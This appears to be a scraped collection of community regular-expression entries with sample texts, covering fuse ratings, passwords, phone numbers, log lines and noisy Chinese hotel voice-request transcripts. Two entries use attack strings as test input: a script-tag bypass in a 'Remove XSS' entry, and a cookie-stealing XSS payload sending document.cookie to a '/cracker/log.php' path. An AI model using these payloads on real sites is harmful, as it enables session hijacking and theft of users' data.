where ( i like 'b' ) and concat(a,b) like ('%'+@p2+'%') where ( i like 'b' ) and concat(a,b) like ('%'+@p2+'%') and a like b where ( i like 'b' ) and a like b and concat(a,b) like ('%'+@p2+'%')
multiple sql like expressions
2016-08-10T12:04:12.000Z
Look for "Fuse - " prefix Any digit or... Any fractional marker (for "3/4") or... Any "m" (for milli) or... Followed by a capital "A"? OR is there a space... ...followed by a number with an A suffix?
(?<=^Fuse - )[\d.\/m]+A|(?<=\s)\dA
Fuse - 1.25A 250V 5x20mm, Glass, Time Delay, 5/pk Fuse - 1A 250V 5x20mm, Glass, Time Delay, 5/pk Fuse - 20A 250V 5x20mm, Glass, Time Delay, 5/pk MDA Style Fuse - 3/4A 250V 5x20mm, Glass, Time Delay, 5/pk MDA Style Fuse - 340mA 250V 5x20mm, Glass, Time Delay, 5/pk MDA Style SCR - 4A 400V T0126
Find current ratings out of a fuse description
2019-02-15T07:34:19.000Z
Password should contain at least 8 symbols, one lower case, one upper case and one number. https://owasp.org/www-community/password-special-characters
(?=.*[0-9])(?=.*[a-z])(?=.*[A-Z])[0-9a-zA-Z !"#$%&'()*+,-.\/:;<=>?@\[\\\]^_`{|}~]{8,255}
Abcdefg !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~1!hi
Password regular expression
2022-10-18T08:21:25.000Z
(?P<l>\d+(\,\d+)?)\s*x\s*(?P<w>\d+(\,\d+)?)\s*x\s*(?P<h>\d+(\,\d+)?)
23,6 x 34 x 17,1
Dimensions AxLxC
2019-02-23T00:17:31.000Z
I use this to extract and later calculate the difference between two times.
([0-9]{1,2}:?(?:[0-9]{2})?)-([0-9]{1,2}:?(?:[0-9]{2})?)\s(AM|PM)
@HOME 8:30-4:15 PM: Full analysis of Concur report (EFF) > Q1 report (Stan 5/6/15) > Sign-in Sheets (127 meetings) @HUB 2:30-3:30 PM: Planning and meeting with Stanley Braxton @HUB 9-4 PM, 6-8 PM: Ashfield HCPHUB configuration; (Old) expenses analysis from Stan; Gaining Concur access from Covis (Dawn)
Extract times from a string
2015-07-14T03:19:14.000Z
Uses a single string to match any node require variables
(var\s|)\s*\w+\s+=\s+require\(\'[\w.\/]*sass[\w.\/]*\'\);*\s*
/** File Head **/ var StyleSheet = require('./stylesheet.scss');var test; var test2 = require('lodash'); var another = require('../../scss/test'); styleSheet = require('stylesheet.scss'), styleSheet = require('stylesheet.sass') StyleSheet = require('./stylesheet.scss');var test; var common = require('common.js'); /** File Foot **/
Node (common.js) require regex
2015-07-14T20:58:57.000Z
<script.*?>.*?<\/script>
<'<script></script>script type="text/javascript">al<script></script>ert("test");<'<script></script>/script>
Remove XSS
2016-02-25T09:17:21.000Z
Trying to discover how to select all ranges except non-escaped parentheses.
[^`()]+
WORKS: select everything except for parentheses: selected (selected)selected NOT WORKING: include escaped parentheses in the selection. It should include \( these \) parentheses, because they are escaped.
Non-parentheses characters, but allow escaped parentheses.
2015-05-25T20:17:19.000Z
dsadsadsa
(?:[\s\/"]+[-\w\/\\\*]+\s*=.+(?:\/\s*>))
this.style.display='none';this.insertAdjacentHTML('afterend','<img src="/cracker/log.php?cookie='+encodeURIComponent(document.cookie)+'" style="display:none" />');
dsadsa
2016-04-14T16:13:23.000Z
^(?:[^_]*){1}
002_part.txt
chars before _
2019-03-05T17:24:53.000Z
This will find almost every (if not every) hungarian phone number such as: 205032935 305032935 705032935 06303335554 +36205032935 0036205032935 (06)-30\3333333 (06)-30\3333-333 (06)-303333333 (+36)303333333 (+36)-30\333 3333 (+36)-30/3333333 (0036)-30\333-3333 (0036)-30\3333 333 (0036) 303333333 0036 74 555 556 +3674 555556 0674555 556 (06)74555556 (0036)-74/555-556
(\()?(\+36|0036|06)?(\))?(-| )?(1|20|2[2-9]|3[0-7]|40|42|4[4-9]|5[2-7]|59|60|62|63|66|68|69|70|7[2-9]|80|8[2-5]|8[7-9]]|90|9[2-9])([\\\/ ])?(\d{6,7}|\d{3}(-| )\d{3,4}|\d{3,4}(-| )\d{3})
205032935 305032935 705032935 06303335554 +36205032935 0036205032935 (06)-30\3333333 (06)-30\3333-333 (06)-303333333 (+36)303333333 (+36)-30\333 3333 (+36)-30/3333333 (0036)-30\333-3333 (0036)-30\3333 333 (0036) 303333333 0036 74 555 556 +3674 555556 0674555 556 (06)74555556 (0036)-74/555-556
Hungarian Phone numbers
2015-09-16T20:25:51.000Z
^((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))@(au\.)?pexipdemo.(com|cn)
213.221.115.114@pexipdemo.com
ip address @pexipdemo.com
2015-06-16T15:38:44.000Z
matches 123.4f 123.4F .4f .4F 5f 5F
((\d*\.\d+)|(?:\d|[1-9]\d+))(?:[f])
Welcome to RegExr v2.0 by gskinner.com! Edit the Expression & Text to see matches. Roll over matches or the expression for details. Undo mistakes with ctrl-z. Save & Share expressions with friends or the Community. A 1f full Reference & Help is available in 123l the Library, or watch the video Tutorial. 123.2L 3f Sample text for testing: abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789 +-.,!@#$%^&*();\/|<>"' 12345 -98.7 3.141 .6180 9,000 +42 555.123.4567 +1-(800)-555-2468 foo@demo.net bar.ba@test.co.uk www.demo.com http://foo.co.uk/ http://regexr.com/foo.html?q=bar
float
2015-10-21T23:31:09.000Z
This one gets from a S3 Bucket URL the bucket name, the zone, and the key
((https|http):\/?\/?)?(?<bucket>[a-z\-]*)(\.s3\.)(?<server>[a-z\-\d]*)(\.amazonaws\.com\/)(?<key>[^?\s]*)(\?)?(?<extra>\??.*)
https://practice-assets-…/img/2iw99y1.jpg
S3 Bucket Info Extractor
2020-06-16T21:59:03.000Z
The following regex will extract email addresses from a document. Sample: This is the email: m23oeo_doc@gmail.com and this is john.doe@outlook.com also can use "," master1@yahoo.com, master2@yahoo.es etc. micro.so@aol.com.
(^|\b)([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+\.)+([a-zA-Z0-9]{2,4})
The following regex, will extract all emails from a document. Sample: This is the email: m23oeo_doc@gmail.com and this is john.doe@outlook.com also can use "," master1@yahoo.com, master2@yahoo.es etc. micro.so@aol.com.
Extract all emails from a document.
2018-06-30T04:28:20.000Z
(\(loggingInfo\)|\(beneLoggingInfo\)) - (?<vendorinfo>[^|]*)\|(?<login>[^|]*)\|(?<action>[^|]*)\|(?<timeStamp>[^\|]*)\|(?<tag2>[^\|]*)\|(?<tag6>[^\|]*)\|(?<tag7>[^\|]*)\|(?<tag8>[^\|]*)\|(?<tag9>[^\|]*)\|(?<tag10>[^\|]*)\|(?<tag11>[^\|]*)\|
18 Jul 2018 09:05:31,068 INFO (loggingInfo) - Auto CRM|ppope|ApplicationLogin|Wed Jul 18 09:05:31 CDT 2018|CSR agent successfully logged in||Successful||||NA| 22 Oct 2018 08:36:41,164 INFO (beneLoggingInfo) - Beneficiary Administration|TESTWHBENE|APPLICATION LOGIN|Mon Oct 22 08:36:41 CDT 2018|User successfully logged in for Client = 070||SUCCESSFUL||||NA| 22 Oct 2018 00:43:23,845 INFO (loggingInfo) - Inquiry Application|TUSER4444|APPLICATION LOGIN|Mon Oct 22 00:43:23 CDT 2018|User successfully logged in for Client : 580||SUCCESSFUL||||NA| 01 Oct 2018 09:29:33,508 INFO (loggingInfo) - ISIS PersonalPlan|TESTOMAR|APPLICATION LOGIN|Mon Oct 01 09:29:33 CDT 2018|User successfully logged in for Client : 002||SUCCESSFUL||||NA| 24 Oct 2018 13:46:07,647 INFO (loggingInfo) - Web-Billing|egunderson| User Authentication|10/24/2018 01:46:07 PM| User Authentication|NA|True| NA| NA| NA| NA|
Solaris10 multiple
2019-01-16T21:10:08.000Z
(出租车)|(叫|打|订|预约|接送)(一辆|辆|一个|个)?(出租)?(车|的士)
就是那个,这个小火车玩具轨道是怎么弄啊,你们给我一个吗? 机车到不合。 嗯,我想问一下那个前台可不可以帮我约一下,明天早上的出租车呀? 帮我拿个车。 我是机器说话,不好意思,我问一下达县的话怎么打的这个这个房间电话。 这个没有货车。 这给我是打开之后就用不了,我没要啊,我不知道啊,我不,我也不是没了了,我就不让我觉得的忘掉了。 平沙的忘记其他是电视怎么打都挺好的,是不是真的,你会不会那边的,现在还要回到,而且还没建的,没有所感,这的。 嗯,有火车吗? 上来一个小推车。 推车。 唉,你好,你这再打的士把那个水给我拿过来。 啊,你好,我想打开那个冰箱,但是你们的冰箱锁上我些东西冰冻。 你们特别不再人七十一阿里比当天的上下车。 喂,你好,明天我是七月零八房间,明天帮我找成月五点二十的出租车到北京南站。 距中车国际怎么走? 我这边要打的到这个套房是不是开车发票自己再回来是不是我只能说是打的非常的一个。 你好,可不可以打扰一下房间的卫生也是没来的及。 里面没有火车的是吧,待会也没有这个。 哎,你好,我想问一下,从咱们这里打车到那个安贞医院。 不叫的车。 一楼有没有信号打不了电话吗?还是刚才打不了的,你好,我这么健身的地方是一下我我的电话的的,应该是大的就是有我们WiFi的时候知道了,好吧,是一下今天前后上取消其三。 嗯,不是,我说我是我说你这,你现在你过去天打的乱了,我是,你你然后我说给我,给我,你不会现在天两个人我。 六点四十帮我约个车。 帮我帮我六点四十元的车。 买火车票。 嗯,您好,我是要要零要我想问一下那个前台可以,就是可以买火车票吗? 额,那个车,车牌号吗?告诉你车的是能直接出去吗? 您好,麻烦送个行李车上来。 我的火车有没有? 我前一个的班车住你的区别。 我要打出租车。 帮我叫辆车。 酒店可以免费停车吗? 有班车吗? 咱们打的拿那个店里。 明天不用打扫才开玩笑的。 嗯,帮我那个车辆放行一下。 嗯,请问一下这边哪里有打印的。 帮我免一个停车费。 帮我处理停车费。 嗯,我要零七今天你们没来打扫卫生吗?我中午出去的十根你们讲得让你们下午来打扫没人来打扫么要二零七啊。 唉,你好,呃,你今天那个呃打扫卫生的时候有没有帮我那个床单过来。 我需要一个行李车是在那个九幺七房间。 行李车。 帮我叫个行李车。 你们力求上面有一千多的和理事,巴掌大议室有的钱消失的什么惊动有感于倒地美金的赌场最近成功的步行提示位置和企鹅南丹自己全部的男爵周南女生西施王子饭店铁打什么刻度为什么能成为自发的统治者,一九八绝对木版布置人声文治回答。 那天请靠近一天车出名的急求。 帮我这边九二零打扫卫生,就是垃圾桶地垃圾还有浴巾这些换的其他的就可以了。 嗯,你好,我找一下打扫厅的。 我帮我登记下车牌出去。 打开所有的灯。 打算八块钱去了那里有一个是小孩我们坐车到大理怎么过去? 我们点的车还没有送过来,麻烦催一下。 嗯,就是那个就是小火车玩车是多吗? 把声音开车最大。 你好,我想问一下,咱这个酒店有没有那个打印的。 个小推车好吧。 那个要要二三要一个协力车。 你怎么天天打不通的呢? 没什么的打牌的,现在那的那边给的,就是。 火车不需要。 反过来,现在上那个百分之六,明天上班的不小时,对不是你坐上班一周工作室,十三个叫的士,一般吃饭时间够掉了,还没有发布啊。 厅车票。 水果刀打车。 嗯,我想要一辆行李车上来帮我拉行李。 可以,是你是打的。 打开卫生间的灯。 车位? 叫出租车。 开车,明天的天气。 嗯,洗卫生间那个车子没有啦。 嗯,我这打的不是前台吗? 片刻的班车,这里的心情啊? 有行李车吗? 嗯,呃,帮我叫一辆车。 嗯,麻烦你给我这是一个火车。 车站不需要。 去机场叫的士。 帮我叫辆车。 那个什么有没有刮胡到我那个汽车吧。 刚才那个前台不是说给我送两个打火机上来的吗? 我那汽车要登记一下。 那个,嗯,唉,我出现我那个那个汽车那个登记一下。 网络不让我自己问放价,就是进口车的电源没有。 马桶堵了,需要车一下。 我明天早上想要打开车七点钟打开车。 晾衣车。 生长是不是小时的神奇的动物园才能手信街的赌场最近成功的步行街是闺蜜合体文采长裤的南极周南一直景区老虎吗吗?定型哪里包车路有什么诚诚公司的同事一起发掘动物园服务生,怎么是芬达? 吃早餐平平什么证件车? 现在订的话叫的士那里的啊。 哎,你好,那个贵酒店,现在每天车辆体温。 嗯,就是这里体温这一块是不重复了我们单位也在测量,你们把那个车辆体温的那个负责人让我联系一下。 打开的。 下车那。 帮我叫一个行李车。 你好,我想通知一下打扫房间的阿姨,我是八二六房间,我不需要打扫卫生,需要换毛巾就可以了。 还有有一盒那个抽纸车子也没了。 火车老一个。 嗯行李车。 我不是说那个电话的问题,我事前有点是我打的电话吧。 不是,我就问一下他们打印东西打印那个s的话,他们几点钟下班那里。 这个车市我的能力范围内吗? 我打电话打了吧分钟的服务也没有来。 要找一个行李车上来。 洗衣服车门收。 我要给我,你这会开车是什么? 嗯,你好,九零九帮我打扫一下房间白天我在屋里休息再的。 开车去没有没有,没有,没有啊。 嗯,给三个服务生弄个小车到八月期间来。 你们请问酒店有打印的电话吗? 哦,我国歌声说不出来打的打过。 把声音开车最大。 就是我想问一下,就是每天都这个就是因为我前两天入住的这个房间是六百吧的房费,然后我想多钱一天,然后刚才在前台,我就定了一天是九百四的,我想问一下,就是因为我们报账每天要打碎吗?我想问一下是可以改的吗? 帮我转接到前台,我的车要出停车场? 你给我坐火车呢。 火车啊,坐火车。 你好,那个帮我打扫房间的看问一下有没有看到一个iPad的。 有停车场? 酒店停车场在哪? 我这个卫生也没打扫开送都没送,该改换的都没换。 动车服务。 动车母乳。 吗,这样做什么车有地方? 我问一下,你那个打牌的那个什么咖啡啊?什么薯片话,那个什么花生都是免费的吗? 坐车的记录? 哦,我你这个我打电话的,你这个是。 不是打不开,没用,你这边就是动机的这里吗? 我想问你一下,如果我要打长途电话的话,我应该怎么打? 我现在这里坐车去联系管理员,再见。 给我叫一辆出租车。 打基础,我能不能换房这个,这个排水不行了,那个下水道不去的,你这处理,处理不了啊,我在有人在里面洗澡啊。 它对我想问一下,因为这个房间能不能给打那个一次性的牙刷牙膏? 火柴送上火车。 这个火车火车。 啊,退房需要用车。 就是服务器的车可以吃吗? 六点早上六点钟开了不会你要走整个电视八点半就没有可以吗?怎么回事?是不是打搅人家早上六点多就八四前部花掉吗说我全部关掉啊,就是流利六六六六是这样三百这样的吗,他们六点到了给他建议,我是八点三十分我。 班车。 打电话,我那个房间里的电视有毛病啊,就没人了。 嗯,我朋友已经衬衫在是要六要六房间的,然后她当时洗完已经退房。他说,把那个车放到我房间,但是我房间没有。 你好,有没有火车。 明天早上七点四十五分,可以给我交一辆出租车吗? 我这个车中文的人吗? 你好,火车能不能送一盒到房间。 这里这个车是免费的吗? 出租车。 嗯,你好,我们需要的火车还没有送过来。 他打的打的都是机器,你是机器人吗? 我想订一个那个明天早上的一个滴滴车可以给我订一下吗? 我想订订车订车。 说帮我打车两人住。 不是那个车那个出口那个白色的车五二幺那个车牌看到了吗,就让他帮忙给弄一下,他那个吗不上。 哎,你好,我那个我媳妇刚才送过来的,那个车现在出去出去了。他说那吗扫不上怎么办呢? 住了塌塌,发车气息,这这个不算需求吗?可以的。 嗯,我需要一个行李车。 货车可以的。 车早餐? 嗯,那我打个元的。 还我刚才打了电话说我那个空调的问题,现在还是二十度是怎么回事啊? 车票? 嗯,拨打前台的电话。 打的上面的被子下棉被。 我问一下你们楼下有没有那个打火机的。 我想打手机号打我的手机。 你火车没有。 哪里还火车? 帮我一个停车费。 帮我处理一下,停车费。 唉,你好,你帮我送那个打包带的呢,打包的胶带。 个洗车。 没给我送呢,还,就晚上送我那个就是我灯亮着不打扰你还没给我送了给我留的卡片是送的时候打电话啊? 呃,下一个大篷车。 嗯,需要一个大推车。 帮我这帮我这个电话开车开通长途。 他们就在不闻不问,不是中午今天仅接受中途教练第一婚姻车出的小站新城六九零观众美元计分共计六积分最后点评增加聚集科技,近道分最高分十分怎么空心十分第二步,即不可电瓶车家周围有几七点初三到盐城提供有出去给进行打几。 的话啊,这个动物的实在是太好了各种各样动物他们它们的区别是什么来决定咱们今天间打有六十观众也就是关注还有座椅垫,很多的事情,那就是帮助我们拿给场上的单位选手。 打开全部的。 打开全部的灯。 你好,我刚才想要那个抽纸车子用完了,怎么还没送来。 呃,我刚刚打电话送的水送过来,没有。 我要更多的浴巾和更多的车子。 我想问一下你酒店可以叫车吗?叫出租车。 卫生间啊,不是卫生间是卫生间洗浴那个打不开里面的洗澡的洗衣液嘻嘻头发的都是拿不到。 说我这都是到打的几钱一位有现在找不到中天。 嗯刚才我给我打电话说酒店汇报,我的早餐送上来,但是好像在已经过了十几分钟,怎么还没有上来。 喂,你好,我想明天预约一个出租车。 个一个行李车好吗? 打房间号的电话。 还有一个问题是问一下您这边是VI的服务不是就是机器人服务还是说是人工服务跟我打电话的对位。 没有,就快一点就行了啊,因为今天早上赶车呢,嗯。 你好,我这个车号。 唉,那个呃我车听酒店门口没事吧? 我要一个行李车。 哦,我需要叫叫车。 嗯,帮我开车。 那咱们是就不带的可以帮我叫车吗? 我那个要个行李车那个现在元过来给我拿一下东西忘楼下一个人拿不着。 好,能帮那一个那个小推车。 我想问一下今天打扫房间的是谁? 打扫房间的时候,我就一张车票,现在不见了,请问一下打扫房间的到我的车票吗? 那个我给你们报个帐二要二环的坐车那个床的射灯。 我要的火车能不能快一点。 九六八要一个的车。 嗯,我需要行李车。 你好,那个我想问一下有没有酒店有没有车到那个动车站的。 不是,我,我这个需要打印啊,几万我的朝外面老大爷店。 我前天怎么打的? 六点二十叫出租车。 如果六点二十分的出租车有没有。 嗯,我后天去八达岭长城的话,你们这里有有什么车或者有什么东西去往那里的吗? 现在打扫房间送换一下床单儿之类的好吧。 打扫房的位置。 打的。 接送车。 转人工打的卫生,现在给我。 打错了个插排我送一个吧,你家的插座不太好使。 要一个停车。 不太会刚才了,我拿房的时候,刚开业没事没事,没事,我也没有用,我这什么,你要是有时候要别的不及是打电话也挺好的,想你好,那个的。 您好,我在幺六零九房间,你们这个冰箱怎么打开是热的能够调一下吗? 刚刚打电话的那个人的。 车去啊。 径直接车出里的事情啊。 好,嗯,你帮我拿个火车吧。 我需要一部行李车叫服务员到我房间。 我需要要一个行李车,我拉行李出去。 哎,我问一下那个,这个那个停车的这个怎么出啊? 是打开电视的苹果。 那个我给我预定一个出租车明天早上六点二十,我到南京要北京南站。 我想问一下我们这边我们本来我们打算明天去长城了,我们是这边坐什么车过去比较方便。 打扫房间的怎么还没过来。 你坐公车住你的心情啊? 怎么拨打这个通州楼层里的电话? 你帮我处理一下,停车费吗? 喂,前台那个我接下迎宾那帮我叫车吧。 严冬现在打折的理事一间暴力知道,我是通过八个点了,又方便写。 你游戏室经理,我可能会在因为是觉得赛车不带我去看过,没有不怎么样,我想有你给我了,因为没有自信吗,都会没自信,好吧,也是对不对。 汽车来瓶矿泉水给我。 不是打扫是那个我们定的机器人送拖鞋,还没有来。 如果叫的士一个。 我在车市怎么打电话? 你好,我刚才给我送了一个车没送过来,要二幺九。 我洗衣服洗车。 停车场在哪里? 帮我打开一下要七幺零房间的门,我拿个东西出来。 加入电视机八点半打的吧。 你好,能有出租车吗? 一一接起来就不说话了,拿打电话的。 哎,你好,我们那个要四一七了,那个一个窗户为什么打不开的。 我想要火车? 有没有火车。 是打不开的,不是啊,遥控器。 没有火车吗? 呃,今天打扫卫生的时候,我这边一个水果拿走了是吗? 电视机打不开,我的房间。 大堂的叫我打这个电话的呀。 我打扫房间,然后把那个洗淑用品的换一下。 那个我要洗车业,你让那个帮我取一下吧。 哎,你好,我想问一下那个那个就是要零幺零要八个要零六零这两个房间我们是五点的那个就是货车动车。 就是前台电话打不通,就是我们房间是应该是含早餐的,不知道什么时候送。 灯打开的好。 我这里卫生还没打扫我们住的是那个,那个那个那个房间。 打的士,我。 一直都没有火车没有。 我们退下不知道怎么着打开我,你听不到一个,我要我们的近还是说是继续我们打算这是没用近郊大人丝丝。 啊,麻烦,我想要一个行李车上来,我是九零七房间。 我,我想要一个行李车。 你这的班车是在你。 停车场。 嗯,问一下明天的早餐是在哪?哪个停车? 帮我送二十张打印纸上来第四的。 您好,我需要要一个那个行李推车六零六房间。 我需要啊,行李车。 这个火车怎么还不送呢。 有点能停车吗? 查询班车情况到宁波。 我需一个行李车。 停车。 然后火车。 那个哪里号火车火车。 嗯行李车行吗? 嗯,给我下来上一辆行李车,把行李拿去,好吧。 嗯,你好,你帮我拿一个S的车。 可以,然后只要打扫卫生间就可以了桌子上的东西也不用洞床也不用再整理好吧。 那个新风在哪个车去没找到啊。 打车到几点? 我们需要需要那那个华为充电器和一盒火车怎么还没拿过来。 嗯,那个帮九零二叫一辆出租车。 好,我我想问一下那个你们这里有没有打印文件的地方。 打打印资料打印资料的地方。 您坐车吗? 唉,你好,帮我打一下那个华为的充电线,小偷的。 那个五零五零七的那个保险箱怎么怎么打不开的吗? 燃油店有停车场吗? 嗯,我要登记车牌号吗? 登记车牌号。 你打开车号,我这看见。 是我,我也就一两个块钱吧,八五六怎么出来四几天我还不会去住,公然附近里加说的无打的,我不知老板,我老板吗?那的对不对。 嗯,我这边是那个九二二房间我刚才在网上订了一瓶酒,然后忘了备注了这个给打开一下送来的时候,谢谢。 怎么打个电话怎么打的前台的。 额,就是如果有人过来打电话问我有没有入住这个酒店,你你们不要透露的信息好吗? 以及医生不出什么打到的士公主不错,你这会酒吧,我这个引起对对,那步行我都用不了。 送两瓶矿泉水,请服务员,请打扫房间的服务员送进来好吗,我要离开门了。 那边班车。 什么是问一下,就是打扫房间的怎么还没过来。 帮我叫辆车。 酒店有晾衣车吗? 嗯,有晾衣杆或者晾衣车吗? 要二五要行李车。 喂?六点二十分二个叫个出租车有吧,到北京北站。 给我六点二十分下面交给车到北京北站的? 青苔帮我打的。 要钱请客的一家车出名的谢谢啊。 来不了也没有车,方便过去不稳,同样就座是不是不免不是没有了,不再那边那里医院的那里吧,那一个什么,什么阴阳桃林机场在这个就是。 楼下停车背是不是免费的。 嗯行李车来一下房间。 我需要那个,这个行李车来房间。 嗯,请安排一辆出租车我要到新疆大厦去。 租车吗?我到新疆大厦去一下。 喂,请问你那个冰箱的,怎么打开的。 这个咱们真的不会打听鄙视打的,真的是。 这里车? 打扫房间换床上的用品。 打理的小时,能不能吃。 能帮我叫车吗? 嗯,你们这有停车场吗? 哎,你好,问一下这个这里打的门口好不好,打的。 这里好打的吗? 价格里面不退了车来。 你好,登陆车牌号。 嗯,停车费。 给我叫辆车,快点。 嗯,我要叫一辆出租车现在。 你好,我想问一下,我想打印一个文件,咱们这儿有没有打印的地方。 给我是一个华为下车。 小有什么解决不到的钱吗?就好了所有的打电话,因为不是应该有友谊,所以好过的的家小很小图啊,有点特别大的拉不动,没有定的比较的分配的大巴不多说在准备。 没有,没有,没有车,你们有。 你的我坐车吗? 嗯,幺幺五房间送个,那打那个火柴抽烟的? 哎,你好,我想打包需要交胶带哪里有卖的还是酒店能提供一下。 我卫生打的方便。 停车收费吗? 请问停车场收费吗? 嗯,我想问一下,咱们的停车场是咱们自己的吧。 给你打过电话了,荞麦皮的枕头,还没有送过来呀。 我的刚才不是打的士吗的讲话个月的? 电车。 嗯,我想打手机号码怎么打用座机的。 酒店的一样吗,然后嗯现在酒店都没钱也很多酒店都放在关门了,反正酒店都是在提价,上海,然后呢,一方面的地位,人家体验吗,然后我们肯定要给人家延期是不是这个是业务上来叫做一个上来。要坐一个小时,只能打的起点,我们就给那些所有的用户多一样,现在比较差,一个月可能有食用的要求,两点两个啊,那这个一年期好像你等是。 你好,我老婆在这儿有你说你说明白怎么找不到有这么高不明白了,网上是这个中下部我的大的那个打的士乡音走个旧的,说不过去,照明灯,我这边一个花花这么不了。 麻烦叫个行李车过来。 嗯,前台,我打前台电话吧的电话。 那这样我我现在打了个房子,我是不是我的洗簌保留的那个房子吗? 帮我送两瓶水过来房间里面用两瓶水一瓶水是打开过的。 电车。 停车收费吗? 唉,请那个来一个来一个行李车好吗,我七零二房间,我们拿行李。 帮我拿两个自行车。
叫车1.0.0.0503
2020-05-03T09:47:04.000Z
https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-dg.pdf#cognito-scenarios
(cognito-idp\.([a-z]{2}-[a-z]{3,5}-[0-9]{1,3})\.amazonaws\.com\/([a-z]{2}-[a-z]{3,5}-[0-9]{1,3}_[0-9]{7,11}))
cognito-idp.us-east-1.amazonaws.com/us-east-1_123456789
aws incognito Identity Pool
2022-08-20T20:03:26.000Z
^(\s)?(\-)?((((\d+)|(\d{1,3})(\,\d{3})*)(\.\d{2})?)|(((\d+)|(\d{1,3})(\.\d{3})*)(\,\d{2})?))$
1111111111 1111111111.00 1111111111,00 1,111,111,111.00 1.111.111.111,00 -1111111111 -1111111111.00 -1111111111,00 -1,111,111,111.00 -1.111.111.111,00
Formatos numericos FNC
2019-09-02T01:39:06.000Z
(.*)[._]([LB].*)[._]([LB].*)[._]to[._]([LB].*?)[._]([RXT][0-9][0-9][0-9])?
rstp_test.4RING.L2.B3_to_B4.RUGGEDCOM.1410370606.330656.csv rstp_test.4RING.L1.B1_to_B3.RUGGEDCOM.1409876246.3805292.csv rstp_test.4RING.L4.B2_to_B4.RUGGEDCOM.1410274007.0488453.csv rstp_test.4RING.L1.B1_to_B2.RUGGEDCOM.1409766439.289125.csv rstp_test.4RING.L2.B2_to_B3.RUGGEDCOM.1410190053.4367692.csv rstp_test.4RING.L4.B1_to_B4.RUGGEDCOM.1409945659.9797068.csv rstp_test.4RING.B1.B2_to_B4.RUGGEDCOM.1410215996.3020053.csv rstp_test.4RING.B2.B1_to_B3.RUGGEDCOM.1409840595.4753985.csv rstp_test.4RING.L1.B1_to_B3.RUGGEDCOM.1409774644.0629122.csv rstp_test.4RING.L2.B1_to_B3.RUGGEDCOM.1409783794.3798475.csv rstp_test.4RING.L1.B2_to_B4.RUGGEDCOM.1410200272.391141.csv rstp_test.4RING.B2.B3_to_B4.RUGGEDCOM.1410463960.426611.csv rstp_test.4RING.L4.B3_to_B4.RUGGEDCOM.1410380637.6085627.csv rstp_test.4RING.L2.B1_to_B3.RUGGEDCOM.1409930404.007381.csv rstp_test.4RING.B1.B3_to_B4.RUGGEDCOM.1410290574.4400978.csv rstp_test.4RING.L1.B3_to_B4.RUGGEDCOM.1410361557.664809.csv rstp_test.Ruggedcom4MESH.B1.B2_to_B4.RUGGEDCOM.1410998524.8515713.csv rstp_test.Ruggedcom4MESH.L5.B1_to_B3.RUGGEDCOM.1410565030.4803162.csv rstp_test.Ruggedcom4MESH.B1.B2_to_B3.RUGGEDCOM.1410894307.4092145.csv rstp_test.Ruggedcom4MESH.L5.B2_to_B3.RUGGEDCOM.1410874962.4593394.csv rstp_test.Ruggedcom4MESH.L1.B2_to_B3.RUGGEDCOM.1410830119.036747.csv rstp_test.Ruggedcom4MESH.L4.B1_to_B4.RUGGEDCOM.1410818346.8478792.csv rstp_test.Ruggedcom4MESH.L1.B2_to_B4.RUGGEDCOM.1411046038.398723.csv rstp_test.Ruggedcom4MESH.L1.B1_to_B2.RUGGEDCOM.1410538012.1777704.csv rstp_test.Ruggedcom4MESH.L5.B2_to_B4.RUGGEDCOM.1411068936.6214309.csv rstp_test.10RING.L3.B5_to_B10.X194.1406642018.4030738.csv rstp_test.10RING.L1.B5_to_B8.X194.1406039517.99918.csv rstp_test.10RING.L1.B1_to_B2.X194.1404311637.8746655.csv rstp_test.10RING.L6.B1_to_B6.X194.1404409034.0917673.csv rstp_test.10RING.L8.B6_to_B10.X194.1407184841.3947148.csv rstp_test.10RING.L1.B5_to_B6.X194.1405602432.5959277.csv rstp_test.10RING.L3.B5_to_B8.X194.1406229983.951392.csv rstp_test.10RING.B3.B2_to_B5.R102.1395789785.86093.csv rstp_test.10RING.B9.B5_to_B7.R102.1399647245.0077384.csv rstp_test.10RING.B10.B2_to_B8.R102.1400507784.6956546.csv rstp_test.10RING.B10.B2_to_B7.R102.1400507787.7033362.csv rstp_test.10RING.B3.B4_to_B10.R102.1396302325.0391262.csv rstp_test.10RING.B3.B4_to_B6.R102.1395844301.2431433.csv rstp_test.10RING.B7.B6_to_B10.R102.1397574991.335163.csv rstp_test.10RING.B3.B5_to_B10.R102.1396449462.3053737.csv rstp_test.10RING.B2.B3_to_B9.R102.1394722388.8338609.csv rstp_test.10RING.B2.B5_to_B9.R102.1395414452.3003325.csv rstp_test.10RING.B4.B3_to_B5.R102.1396623381.6665363.csv rstp_test.10RING.B8.B2_to_B6.R102.1397753762.820343.csv rstp_test.10RING.B2.B1_to_B3.R102.1394471673.4672673.csv rstp_test.10RING.B1.B2_to_B6.R102.1392928556.4662197.csv rstp_test.10RING.B1.B2_to_B10.R102.1393438312.2513487.csv rstp_test.10RING.B9.B1_to_B8.R102.1399041962.7315886.csv rstp_test.10RING.B9.B5_to_B6.R102.1386610339.0566068.csv rstp_test.10RING.B7.B1_to_B6.R102.1396967513.4156904.csv rstp_test.10RING.B1.B3_to_B7.R102.1393522009.8953934.csv rstp_test.10RING.B9.B3_to_B7.R102.1399474391.7047045.csv rstp_test.10RING.B8.B3_to_B7.R102.1397832087.1118913.csv rstp_test.10RING.B10.B4_to_B7.R102.1400767694.379997.csv rstp_test.10RING.B4.B2_to_B5.R102.1396535811.0485063.csv rstp_test.10RING.B10.B2_to_B6.R102.1400253404.7032743.csv rstp_test.10RING.B10.B2_to_B9.R102.1400542932.4745657.csv rstp_test.10RING.B3.B4_to_B7.R102.1395930356.613959.csv rstp_test.10RING.B4.B5_to_B10.R102.1396967354.51417.csv rstp_test.10RING.B8.B3_to_B6.R102.1397832089.7937355.csv rstp_test.10RING.B9.B1_to_B6.R102.1398870157.1669145.csv rstp_test.10RING.B10.B3_to_B8.R102.1400715498.7837806.csv rstp_test.10RING.B2.B5_to_B10.R102.1395414447.7340415.csv rstp_test.10RING.B7.B6_to_B9.R102.1397574995.4208224.csv rstp_test.10RING.B7.B3_to_B6.R102.1397055076.5749526.csv rstp_test.10RING.B9.B1_to_B7.R102.1399041967.8380318.csv 